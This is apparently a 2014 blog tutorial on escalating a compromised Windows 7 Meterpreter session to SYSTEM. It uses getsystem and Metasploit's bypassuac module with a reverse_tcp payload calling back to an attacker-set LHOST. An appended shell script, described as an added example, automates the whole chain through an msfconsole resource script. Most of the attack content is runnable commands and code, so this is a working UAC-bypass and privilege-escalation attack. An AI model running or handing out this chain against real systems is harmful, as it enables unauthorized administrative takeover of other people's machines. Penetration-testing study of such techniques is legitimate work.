Bypass UAC and get admin privilege in Windows 7 using Metasploit
Filed under: ETHICAL HACKING, KALI LINUX, PEN-TESTING — 9 Comments
June 19, 2014

Sometimes, when you exploit a security hole and gain access to the target system, you end up
running only as the user who was logged in, not as the local SYSTEM account. This tip shows the
steps needed to escalate that privilege from inside Meterpreter.

The screenshot below was taken after I successfully gained access using a payload I created.

meterpreter > getuid


The output of getuid shows that we are running as the user who is logged in to the system, not
as the SYSTEM account. How do we escalate from that user to SYSTEM?

The session only has limited user rights, which severely limits what you can do on the remote
system: dumping password hashes, manipulating the registry, installing backdoors, and so on.

Fortunately, Meterpreter has a 'getsystem' command (provided by the priv extension) that tries a
number of different techniques to gain SYSTEM-level privileges on the remote system. Various
local exploit modules can also be used to escalate privileges.

To make use of the 'getsystem' command, if it is not already loaded we first need to load the
'priv' extension:

meterpreter > use priv

meterpreter > getsystem

We let Metasploit do the heavy lifting for us by running "getsystem" without any options. The
command attempts every technique available to it, stopping at the first one that succeeds.

There are situations where getsystem fails, depending on the operating system and on the access
we already have. In the image above we only have a normal user account with limited privileges.
Running post/windows/gather/win_privs lists the privileges held by the current user, whether it
is a member of the local Administrators group, and whether UAC is enabled; that is exactly the
information you need before deciding how to escalate.

For this tutorial the victim machine runs Windows 7. Executing sysinfo in your Meterpreter shell
gives you information about the system you are exploiting.

meterpreter > sysinfo

meterpreter > run post/windows/gather/win_privs

If UAC is disabled, or the session is already running elevated as a local administrator,
getsystem succeeds directly: the unfiltered administrator token keeps privileges such as
SeImpersonatePrivilege, which getsystem's named-pipe impersonation technique relies on.

When we execute getsystem here it fails, because UAC is enabled by default on Windows 7 and
even a member of the Administrators group then runs with a filtered, medium-integrity token that
lacks those privileges. So we first have to bypass UAC. Luckily, Metasploit has a Windows UAC
bypass exploit module. Note that it only helps when the logged-in user is a member of the local
Administrators group; from a standard user account you need a different local privilege
escalation exploit.

Meterpreter on Kali no longer recognizes "run bypassuac"; instead we have to use the module
exploit/windows/local/bypassuac. This exploit bypasses Windows UAC on Windows Vista and Windows
7, on both x86 and x64 operating systems. At the time of writing (June 2014) the issue has not
been patched and can still be exploited on the most recent operating systems.

To do that we background the current session, select the bypassuac exploit, point it at the
session we just backgrounded, run it, and then execute getsystem in the new session to get admin
privilege.

meterpreter > background

msf > search uac

msf > use exploit/windows/local/bypassuac

I exploited this machine with the payload I created before, so use the same method you used for
exploiting the machine before.

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set LHOST 192.168.31.20

msf exploit(bypassuac) > set LPORT 8080

msf exploit(bypassuac) > set SESSION 1

msf exploit(bypassuac) > exploit


Once the new session opens (it runs with a high-integrity token), run getsystem in it:

meterpreter > getsystem
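The whole sequence above (win_privs on the original session, the bypassuac module, then getsystem in the new session) can be driven from one msfconsole resource script. The wrapper below is an added example, not code from the original post: it validates the parameters, writes the resource script, and optionally runs it. It assumes msfconsole is on PATH, that the installed Metasploit supports `sessions -C` and `<ruby>` blocks in resource scripts, and that no other session arrives between the bypass and the getsystem call; `build_rc`, `run_rc` and the validators are my names.

```shell
#!/bin/sh
# Added example (not from the original post): build an msfconsole resource
# script that automates "win_privs -> bypassuac -> getsystem on the new session".

# validate_ipv4 ADDR: succeed only for a dotted quad with octets 0-255.
validate_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  _ifs=$IFS; IFS=.; set -- $1; IFS=$_ifs
  [ $# -eq 4 ] || return 1
  for _o in "$@"; do
    [ ${#_o} -le 3 ] && [ "$_o" -le 255 ] || return 1
  done
  return 0
}

# validate_port PORT: succeed only for 1-65535.
validate_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ ${#1} -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# build_rc SESSION LHOST LPORT OUTFILE: write the resource script to OUTFILE.
build_rc() {
  session=$1; lhost=$2; lport=$3; out=$4
  case $session in ''|*[!0-9]*) echo "bad SESSION id: $session" >&2; return 1 ;; esac
  validate_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  validate_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  cat >"$out" <<EOF
# 1. Show what the low-privileged session can do (admin group? UAC enabled? privileges).
use post/windows/gather/win_privs
set SESSION $session
run
# 2. Spawn a high-integrity Meterpreter through the UAC bypass, launched from the
#    original session. -z: wait for the new session but do not interact with it.
use exploit/windows/local/bypassuac
set SESSION $session
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
exploit -z
# 3. Run getsystem on the newest session, i.e. the one the bypass just opened
#    (assumption: no other session arrived in the meantime).
<ruby>
sid = framework.sessions.keys.max
run_single("sessions -C getsystem -i #{sid}")
run_single("sessions -C getuid -i #{sid}")
</ruby>
EOF
}

# run_rc OUTFILE: hand the generated script to msfconsole.
run_rc() {
  msfconsole -q -r "$1"
}

# Usage: sh bypassuac.sh SESSION LHOST LPORT [OUTFILE]; with no arguments nothing runs.
if [ $# -ge 3 ]; then
  build_rc "$1" "$2" "$3" "${4:-bypassuac.rc}" && run_rc "${4:-bypassuac.rc}"
fi
```

Running `sh bypassuac.sh 1 192.168.31.20 8080` reproduces the post's settings; the `-z` flag keeps msfconsole from dropping you into the new session so that the `<ruby>` step can locate it and run getsystem non-interactively.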


Source: https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-in-windows-7-using-metasploit/
